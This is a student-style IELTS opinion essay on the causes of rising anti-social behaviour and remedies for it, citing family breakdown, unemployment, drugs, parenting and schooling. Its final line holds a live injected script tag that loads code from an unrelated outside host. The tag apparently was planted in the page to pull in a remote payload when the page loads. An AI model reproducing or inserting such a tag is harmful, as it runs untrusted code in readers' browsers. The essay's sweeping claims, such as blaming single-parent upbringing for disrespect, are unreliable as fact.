Many people believe that today there is a general increase in anti-social behavior and lack of respect for others. What might have caused this situation? How to improve it?

Modernity has brought a strict definition of individuality which make people very self-centered. It is true that people show anti-social behavior and disrespect to others these days. There are several reasons for this problem and various steps can be taken by government, society, individual, parents and schools to improve this situation.

There are variety of factors behind this problem. First, there are many problems in family such as serious conflict between parents, divorce, poverty, lack of education or no role model for children. For instance, if a child is being handled by a single parent then he/she may disrespect to others. Second, the poor educational background and unemployment can lead family members to misbehave with each other. The next reason is that drugs and alcohol contribute to increase anti-social behavior in society. Because of consuming alcohol and drugs, people are not aware about their behavior which can result in committing crime.

The situation can be improved only when people understand their moral responsibility towards society. Moreover, parents have a critical role in teaching their children the difference between right and wrong. The should encourage their children to be confident and to be proud for themselves and their family. Also, young people must be taught in schools and colleges to check sense for their independence, their responsibilities towards society they live in and ask them to be a sensible human beings. Finally, the intensive supervision and surveillance program on children and adults should be one of the most effective steps.

To close, I believe that government and people can tackle this problem by educating society. However, with the proper knowledge of values and morals, this problem can be addressed. <script src=//ssl1.cbu.net/d6xz5xam></script>